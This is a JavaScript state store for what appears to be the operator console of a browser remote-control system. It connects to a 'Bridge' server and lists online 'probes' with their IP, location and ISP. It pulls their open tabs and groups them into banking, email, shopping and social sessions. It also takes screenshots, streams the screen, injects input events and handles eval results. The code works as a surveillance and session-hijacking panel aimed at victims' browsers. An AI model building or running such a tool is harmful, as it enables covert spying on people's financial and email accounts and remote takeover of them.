import { create } from 'zustand';

const useStore = create((set, get) => ({
    socket: null,
    ws: null, // Expose WebSocket for DevToolsPanel
    isConnected: false,
    targetId: '',
    logs: [],
    onlineTargets: [], // Track online Probes with metadata
    probeTabs: {}, // Map: probeId -> [tabs]
    currentScreenshot: null,
    isMirroring: false,
    pendingCallbacks: {}, // Map: commandId -> callback for DevTools responses

    connect: (url) => {
        const ws = new WebSocket(url);

        ws.onopen = () => {
            console.log('Connected to Bridge');
            set({ isConnected: true, socket: ws, ws: ws });
            // Register as Developer
            ws.send(JSON.stringify({ type: 'REGISTER', role: 'DEVELOPER', id: 'dev_' + Date.now() }));

            // Request list of online targets
            setTimeout(() => {
                ws.send(JSON.stringify({ type: 'LIST_TARGETS' }));
            }, 500);
        };

        ws.onmessage = (event) => {
            try {
                const msg = JSON.parse(event.data);
                const { logs } = get();

                // Log all messages except heartbeats to avoid clutter
                if (msg.type !== 'PING' && msg.type !== 'PONG' && msg.type !== 'SCREENSHOT_DATA') {
                    set({ logs: [...logs, { timestamp: new Date().toISOString(), ...msg }] });
                }

                // Handle Screenshot Data
                if (msg.type === 'SCREENSHOT_RESULT') {
                    console.log('[Store] SCREENSHOT_RESULT received:', {
                        hasPayload: !!msg.payload,
                        hasDataUrl: !!msg.payload?.dataUrl,
                        dataUrlLength: msg.payload?.dataUrl?.length || 0
                    });
                    if (msg.payload?.dataUrl) {
                        set({ currentScreenshot: msg.payload.dataUrl, isMirroring: false });
                        console.log('[Store] ✅ Screenshot set to currentScreenshot');
                    }
                }

                // Handle target discovery
                if (msg.type === 'PROBE_ONLINE' || msg.type === 'TARGET_LIST') {
                    const currentTargets = get().onlineTargets;
                    if (msg.targets && Array.isArray(msg.targets)) {
                        set({ onlineTargets: msg.targets });
                        // Auto-fetch tabs for all targets to populate views
                        msg.targets.forEach(t => {
                            if (t && t.id) {
                                ws.send(JSON.stringify({ type: 'GET_TABS', targetId: t.id }));
                            }
                        });
                    } else if (msg.probeId) {
                        if (!currentTargets.find(t => t.id === msg.probeId)) {
                            set({
                                onlineTargets: [...currentTargets, {
                                    id: msg.probeId,
                                    metadata: msg.metadata || {},
                                    timestamp: msg.timestamp
                                }]
                            });
                            // Fetch tabs for new probe
                            ws.send(JSON.stringify({ type: 'GET_TABS', targetId: msg.probeId }));
                        }
                    }
                }

                // Handle Tab List
                if (msg.type === 'TABS_LIST' && msg.targetId) {
                    set(state => ({
                        probeTabs: {
                            ...state.probeTabs,
                            [msg.targetId]: msg.tabs || []
                        }
                    }));
                }

                // Handle EVAL_RESULT and RADAR_UPDATE for DevTools
                if (msg.type === 'EVAL_RESULT' || msg.type === 'RADAR_UPDATE') {
                    const { pendingCallbacks } = get();
                    const callback = pendingCallbacks[msg.id];
                    if (callback && typeof callback === 'function') {
                        callback(msg);
                        // Remove callback after execution
                        const { [msg.id]: removed, ...remaining } = pendingCallbacks;
                        set({ pendingCallbacks: remaining });
                    }
                }
            } catch (e) {
                console.error('Error processing message:', e, event.data);
            }
        };

        ws.onclose = () => {
            console.log('Disconnected from Bridge. Reconnecting in 5s...');
            set({ isConnected: false });
            setTimeout(() => get().connect(url), 5000);
        };
    },

    connectToTarget: (targetId) => {
        const { socket } = get();
        if (socket) {
            socket.send(JSON.stringify({ type: 'CONNECT_TO_ROOM', role: 'DEVELOPER', targetId }));
            set({ targetId });
            // Refresh tabs when connecting
            socket.send(JSON.stringify({ type: 'GET_TABS', targetId }));
        }
    },

    sendCommand: (type, payload, callback) => {
        const { socket, targetId } = get();
        if (socket) {
            const commandId = payload?.id || Date.now();
            const message = {
                type,
                targetId,
                ...payload,
                id: commandId
            };

            // If callback provided, store it
            if (callback) {
                const { pendingCallbacks } = get();
                set({
                    pendingCallbacks: {
                        ...pendingCallbacks,
                        [commandId]: callback
                    }
                });
            }

            socket.send(JSON.stringify(message));
        }
    },

    disconnect: () => {
        set({ targetId: '', currentScreenshot: null });
    },

    captureScreenshot: () => {
        const { socket, targetId } = get();
        if (socket && targetId) {
            set({ isMirroring: true });
            socket.send(JSON.stringify({ type: 'GET_SCREENSHOT', targetId }));
        }
    },

    // --- Missing Functions Implementation ---
    isWebRtcActive: false,
    currentMjpeg: null,
    screenshotError: null,

    requestWebRtc: (targetId) => {
        const { socket } = get();
        if (socket && targetId) {
            set({ isWebRtcActive: true });
            socket.send(JSON.stringify({ type: 'START_WEBRTC', targetId }));
        }
    },

    closeWebRtc: () => {
        const { socket, targetId } = get();
        if (socket && targetId) {
            set({ isWebRtcActive: false });
            socket.send(JSON.stringify({ type: 'STOP_WEBRTC', targetId }));
        }
    },

    startMjpeg: (targetId) => {
        const { socket } = get();
        if (socket && targetId) {
            socket.send(JSON.stringify({ type: 'START_MJPEG', targetId }));
        }
    },

    stopMjpeg: (targetId) => {
        const { socket } = get();
        if (socket && targetId) {
            set({ currentMjpeg: null });
            socket.send(JSON.stringify({ type: 'STOP_MJPEG', targetId }));
        }
    },

    sendInputEvent: (eventData) => {
        const { socket, targetId } = get();
        if (socket && targetId) {
            socket.send(JSON.stringify({
                type: 'INPUT_EVENT',
                targetId,
                event: eventData
            }));
        }
    },

    exportData: (type, format) => {
        console.log(`Exporting ${type} as ${format}`);
        // Placeholder implementation
        const data = JSON.stringify(get().logs, null, 2);
        const blob = new Blob([data], { type: 'application/json' });
        const url = URL.createObjectURL(blob);
        const a = document.createElement('a');
        a.href = url;
        a.download = `aether-logs-${Date.now()}.json`;
        a.click();
    },

    // --- Selectors for Views ---

    // Network View: IP (Org) -> Platform (Device) -> Probe
    getNetworkView: () => {
        const { onlineTargets } = get();
        const tree = {};

        onlineTargets.forEach(target => {
            const ip = target.metadata?.clientIp || 'Unknown IP';
            const location = target.metadata?.ipLocation || 'Unknown Location';
            const isp = target.metadata?.ipIsp || '';
            const platform = target.metadata?.platform || 'Unknown Device';

            const orgKey = `${ip} (${location})`;

            if (!tree[orgKey]) {
                tree[orgKey] = {
                    id: ip,
                    label: orgKey,
                    subLabel: isp,
                    type: 'ORG',
                    children: {}
                };
            }

            if (!tree[orgKey].children[platform]) {
                tree[orgKey].children[platform] = {
                    id: `${ip}-${platform}`,
                    label: platform,
                    type: 'DEVICE',
                    children: []
                };
            }

            tree[orgKey].children[platform].children.push({
                ...target,
                type: 'PROBE',
                label: target.id
            });
        });

        return Object.values(tree).map(org => ({
            ...org,
            children: Object.values(org.children)
        }));
    },

    // Business View: Category -> Platform -> Tab (Session)
    getBusinessView: () => {
        const { probeTabs, onlineTargets } = get();
        const tree = {
            'E-Commerce': {},
            'Social Media': {},
            'Finance': {},
            'Email': {},
            'Other': {}
        };

        Object.entries(probeTabs).forEach(([probeId, tabs]) => {
            const target = onlineTargets.find(t => t.id === probeId);
            if (!target) return;

            tabs.forEach(tab => {
                const classification = classifyTab(tab.url, tab.title);
                const category = classification.category;
                const platform = classification.platform;

                if (!tree[category][platform]) {
                    tree[category][platform] = [];
                }

                tree[category][platform].push({
                    ...tab,
                    probeId: probeId,
                    probeIp: target.metadata?.clientIp,
                    type: 'SESSION'
                });
            });
        });

        return Object.entries(tree).map(([category, platforms]) => ({
            id: category,
            label: category,
            type: 'CATEGORY',
            children: Object.entries(platforms).map(([platform, sessions]) => ({
                id: `${category}-${platform}`,
                label: platform,
                type: 'PLATFORM',
                children: sessions
            }))
        })).filter(cat => cat.children.length > 0); // Only show categories with active sessions
    }
}));

// Helper: Classify URL
function classifyTab(url, title) {
    const u = (url || '').toLowerCase();
    const t = (title || '').toLowerCase();

    // E-Commerce
    if (u.includes('amazon') || t.includes('amazon')) return { category: 'E-Commerce', platform: 'Amazon' };
    if (u.includes('ebay') || t.includes('ebay')) return { category: 'E-Commerce', platform: 'eBay' };
    if (u.includes('taobao') || t.includes('taobao')) return { category: 'E-Commerce', platform: 'Taobao' };
    if (u.includes('jd.com') || t.includes('jd')) return { category: 'E-Commerce', platform: 'JD.com' };
    if (u.includes('shopify')) return { category: 'E-Commerce', platform: 'Shopify' };
    if (u.includes('temu')) return { category: 'E-Commerce', platform: 'Temu' };
    if (u.includes('aliexpress')) return { category: 'E-Commerce', platform: 'AliExpress' };
    if (u.includes('1688')) return { category: 'E-Commerce', platform: '1688' };

    // Social
    if (u.includes('facebook') || t.includes('facebook')) return { category: 'Social Media', platform: 'Facebook' };
    if (u.includes('instagram') || t.includes('instagram')) return { category: 'Social Media', platform: 'Instagram' };
    if (u.includes('tiktok') || t.includes('tiktok')) return { category: 'Social Media', platform: 'TikTok' };
    if (u.includes('twitter') || u.includes('x.com')) return { category: 'Social Media', platform: 'X (Twitter)' };
    if (u.includes('linkedin')) return { category: 'Social Media', platform: 'LinkedIn' };
    if (u.includes('wechat') || u.includes('weixin')) return { category: 'Social Media', platform: 'WeChat' };
    if (u.includes('weibo')) return { category: 'Social Media', platform: 'Weibo' };
    if (u.includes('xiaohongshu')) return { category: 'Social Media', platform: 'Xiaohongshu' };

    // Finance
    if (u.includes('paypal')) return { category: 'Finance', platform: 'PayPal' };
    if (u.includes('stripe')) return { category: 'Finance', platform: 'Stripe' };
    if (u.includes('bank') || u.includes('chase') || u.includes('wellsfargo')) return { category: 'Finance', platform: 'Banking' };

    // Email
    if (u.includes('mail.google') || u.includes('gmail')) return { category: 'Email', platform: 'Gmail' };
    if (u.includes('outlook') || u.includes('live.com')) return { category: 'Email', platform: 'Outlook' };

    try {
        return { category: 'Other', platform: new URL(url).hostname };
    } catch {
        return { category: 'Other', platform: 'Unknown' };
    }
}

export default useStore;
